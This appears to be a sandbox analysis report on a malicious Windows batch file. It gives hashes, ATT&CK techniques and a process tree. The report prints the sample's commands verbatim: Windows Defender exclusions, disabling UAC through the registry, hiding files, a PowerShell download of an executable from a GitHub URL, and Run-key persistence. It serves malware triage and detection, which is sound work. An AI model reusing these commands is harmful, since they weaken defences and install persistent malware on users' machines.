7680d0a8ddfaa5802cc5b3f658fb24b1a1df3c19121cb7e365c9fd3dbbf70213

Analysis

max time kernel
16s
max time network
17s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
14/08/2024, 12:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

-.bat.fud.bat
Size

8KB
MD5

5f6b1db506b37d5de1b52d70f1a42b1d
SHA1

df4baf61c956eccd919deb74b1fdd7dc9d319926
SHA256

7680d0a8ddfaa5802cc5b3f658fb24b1a1df3c19121cb7e365c9fd3dbbf70213
SHA512

c574a8872a4954caacd25e4ddb5d594bbc27d363ea7a8e1343963c2413d960d6891797c0ede0b3bc7365cf3628d5eb8a39a1b5d70fe87b7e72b51fcadf3829ee
SSDEEP

192:Y+pkh/m0cbdoW/CX2bKesv6jcNQbWZdtJiO4qsGJ3nI1M0:YVh/VY7/CX2bTaZdHiFqfRIB

Score

10^/10

evasion execution persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2732	powershell.exe
2260	powershell.exe
2464	powershell.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Die.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Windows\\System32\\Microsoft\\UnderControl.exe\" /f"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Die.exe"	reg.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
2628	reg.exe
2680	reg.exe
1432	reg.exe
3028	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2260	powershell.exe
2732	powershell.exe
2464	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 2388 wrote to memory of 2792	2388	cmd.exe	31
PID 2388 wrote to memory of 2792	2388	cmd.exe	31
PID 2388 wrote to memory of 2792	2388	cmd.exe	31
PID 2792 wrote to memory of 2868	2792	net.exe	32
PID 2792 wrote to memory of 2868	2792	net.exe	32
PID 2792 wrote to memory of 2868	2792	net.exe	32
PID 2388 wrote to memory of 2260	2388	cmd.exe	33
PID 2388 wrote to memory of 2260	2388	cmd.exe	33
PID 2388 wrote to memory of 2260	2388	cmd.exe	33
PID 2388 wrote to memory of 2732	2388	cmd.exe	34
PID 2388 wrote to memory of 2732	2388	cmd.exe	34
PID 2388 wrote to memory of 2732	2388	cmd.exe	34
PID 2388 wrote to memory of 3068	2388	cmd.exe	35
PID 2388 wrote to memory of 3068	2388	cmd.exe	35
PID 2388 wrote to memory of 3068	2388	cmd.exe	35
PID 2388 wrote to memory of 2464	2388	cmd.exe	36
PID 2388 wrote to memory of 2464	2388	cmd.exe	36
PID 2388 wrote to memory of 2464	2388	cmd.exe	36
PID 2388 wrote to memory of 2628	2388	cmd.exe	37
PID 2388 wrote to memory of 2628	2388	cmd.exe	37
PID 2388 wrote to memory of 2628	2388	cmd.exe	37
PID 2388 wrote to memory of 2672	2388	cmd.exe	38
PID 2388 wrote to memory of 2672	2388	cmd.exe	38
PID 2388 wrote to memory of 2672	2388	cmd.exe	38
PID 2388 wrote to memory of 2680	2388	cmd.exe	39
PID 2388 wrote to memory of 2680	2388	cmd.exe	39
PID 2388 wrote to memory of 2680	2388	cmd.exe	39
PID 2388 wrote to memory of 1432	2388	cmd.exe	40
PID 2388 wrote to memory of 1432	2388	cmd.exe	40
PID 2388 wrote to memory of 1432	2388	cmd.exe	40
PID 2388 wrote to memory of 3028	2388	cmd.exe	41
PID 2388 wrote to memory of 3028	2388	cmd.exe	41
PID 2388 wrote to memory of 3028	2388	cmd.exe	41

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3068	attrib.exe
2672	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\-.bat.fud.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2388
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PP2'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\Microsoft'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2732
- C:\Windows\system32\attrib.exe
  attrib +h "PP2" /s/d
  2⤵
  - Views/modifies file attributes
  PID:3068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://github.com/AdeebToPro/-/raw/main/Die.exe' -OutFile Die.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2464
- C:\Windows\system32\reg.exe
  reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:2628
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\PP2\Die.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:2672
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Die.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:2680
- C:\Windows\system32\reg.exe
  reg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Windows\System32\Microsoft\UnderControl.exe\" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1432
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Die.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:3028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
97eb8a14d1cb8bb27343d1c35a21c408

SHA1
1fcf688984a9d010837028956bbe6a28b2a7d375

SHA256
97c121aec4e00baf99baf0f981659134edbfa4ef1db60739f8e3e99ea6c14986

SHA512
70570b7114f73fb26de2c4be0a07ec97dafdbc7fc2b79ccc205905e265ba6a88c873ac13d5bf295623e3852f5446b9cfd4f391237f3fe9b7096f1d1bbd561005

Download Submit
memory/2260-4-0x000007FEF62AE000-0x000007FEF62AF000-memory.dmp

Filesize
4KB

Download
memory/2260-5-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2260-7-0x000007FEF5FF0000-0x000007FEF698D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-6-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2260-8-0x000007FEF5FF0000-0x000007FEF698D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-9-0x000007FEF5FF0000-0x000007FEF698D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-10-0x000007FEF5FF0000-0x000007FEF698D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-11-0x000007FEF5FF0000-0x000007FEF698D000-memory.dmp

Filesize
9.6MB

Download
memory/2260-12-0x000007FEF5FF0000-0x000007FEF698D000-memory.dmp

Filesize
9.6MB

Download
memory/2732-19-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2732-18-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download